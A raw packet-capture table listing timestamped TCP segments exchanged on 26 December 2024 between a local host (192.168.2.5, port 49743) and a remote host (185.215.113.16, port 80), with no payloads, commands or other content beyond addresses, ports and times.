Dec 26, 2024 13:01:56.111037016 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.112117052 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.112509012 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.112556934 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.113513947 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.114085913 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.114156008 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.114949942 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.115118027 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.116405964 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.116475105 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.116482019 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.117850065 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.117917061 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.118244886 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.118419886 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.119262934 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.119807005 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.119911909 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.120682955 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.120879889 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.120929956 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.122116089 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.122359037 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.123193026 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.123486996 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.123820066 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.124960899 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.125020981 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.125159025 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.126365900 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.126405954 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.126416922 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.127099037 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.127692938 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.127844095 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.127911091 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.129103899 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.129199982 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.129337072 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.130526066 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.130553007 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.131141901 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.131860018 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.132450104 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.133316994 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.133368015 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.133398056 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.134727955 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.134800911 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.134810925 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.134859085 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.136233091 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.136249065 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.136298895 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.137437105 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.138830900 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.138844967 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.138865948 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.138928890 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.138947964 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.140225887 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.140609026 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.140655041 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.141649961 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.142968893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.143057108 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.143101931 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.143408060 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.143534899 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.144408941 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.144722939 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.144771099 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.145790100 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.146022081 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.146092892 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.147212029 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.147671938 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.147747040 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.148682117 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.148854971 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.150048018 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.150166035 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.150777102 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.151503086 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.151529074 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.151715040 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.151840925 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.152966022 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.153544903 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.153614998 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.154236078 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.154252052 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.154438019 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.155586958 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.155838013 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.155905008 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.157013893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.157028913 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.157124043 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.158382893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.159106016 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.159797907 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.159859896 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.159984112 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.161156893 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.161223888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.161575079 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.162594080 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.162673950 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.162679911 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.163229942 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.163880110 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.215578079 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.298690081 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.298724890 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.298841000 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.299153090 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.299458027 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.299519062 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.299631119 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.300455093 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.300499916 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.300537109 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.301510096 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.301616907 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.301954031 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.302602053 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.302614927 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.302666903 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.303692102 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.303739071 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.303874969 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.304769039 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.304781914 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.304831982 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.305762053 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.305886984 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.305922985 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.306847095 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.307025909 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.307038069 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.308000088 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.308069944 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.308141947 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.309005976 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.309046030 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.309236050 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.310044050 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.310276985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.310370922 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.312838078 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.312855959 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.312866926 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.312880039 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.312962055 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.313256025 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.313357115 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.313397884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.314429045 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.314559937 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.314805031 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.315371990 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.315428972 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.315761089 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.316416025 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.316569090 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.316683054 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.317457914 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.317708969 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.317806005 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.318531036 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.318700075 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.318772078 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.319618940 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.319700003 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.319768906 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.320710897 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.321444035 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.321526051 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.321777105 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.321789980 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.321989059 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.322870016 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.323355913 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.323357105 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.323987961 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.324055910 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.324385881 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.324888945 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.324985027 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.325898886 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.325970888 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.325989962 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.326055050 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.327188015 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.327270985 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.327333927 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.328170061 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.328391075 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.329082966 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.329200983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.329214096 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.329262972 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.331024885 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.331233978 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.331285000 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.331300974 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.331307888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.331335068 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.332498074 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.332923889 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.333252907 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.333415031 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.333427906 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.333473921 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.334558964 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.335515976 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.335530043 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.335594893 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.336544037 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.336606026 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.336618900 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.336683989 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.337677002 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.338319063 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.338381052 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.338823080 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.339109898 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.339689970 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.339746952 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.339759111 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.339807987 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.340858936 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.341130018 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.341209888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.341871023 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.342099905 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.342176914 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.343101978 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.343175888 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.343350887 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.344063997 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.344113111 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.344273090 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.345074892 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.345381021 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.345424891 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.346115112 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.346174955 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.346810102 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.347186089 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.347239017 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.347362041 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.348264933 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.348315001 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.348695040 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.349284887 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.349373102 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.349416971 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.350363970 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.350462914 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.350572109 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.351429939 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.351490021 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.351624966 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.352539062 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.352555037 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.352612019 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.353600979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.353683949 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.353971958 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.402981997 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.509542942 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.509782076 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.509900093 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.510088921 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.510375023 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.510407925 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.511056900 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.511248112 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.511290073 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.512161016 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.512545109 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.512604952 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.513173103 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.513449907 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.513493061 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.514252901 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.514448881 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.514491081 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.515328884 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.515623093 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.515677929 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.516346931 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.516457081 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.516527891 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.517416954 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.518017054 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.518060923 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.518491983 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.519174099 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.519330978 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.519576073 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.520064116 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.520103931 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.520648003 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.520956993 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.521008968 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.521667004 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.521953106 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.522058964 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.522757053 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.523797989 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.523809910 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.523843050 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.523866892 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.523978949 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.524878979 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.525444984 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.525536060 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.525964975 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.526745081 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.526784897 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.526989937 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.527085066 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.527153015 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.528211117 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.528333902 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.528429031 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.529339075 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.529467106 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.529546976 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.530205965 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.530580044 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.530643940 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.531429052 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.531989098 CET	80	49743	185.215.113.16	192.168.2.5
Dec 26, 2024 13:01:56.532038927 CET	49743	80	192.168.2.5	185.215.113.16
Dec 26, 2024 13:01:56.532636881 CET	80	49743	185.215.113.16	192.168.2.5
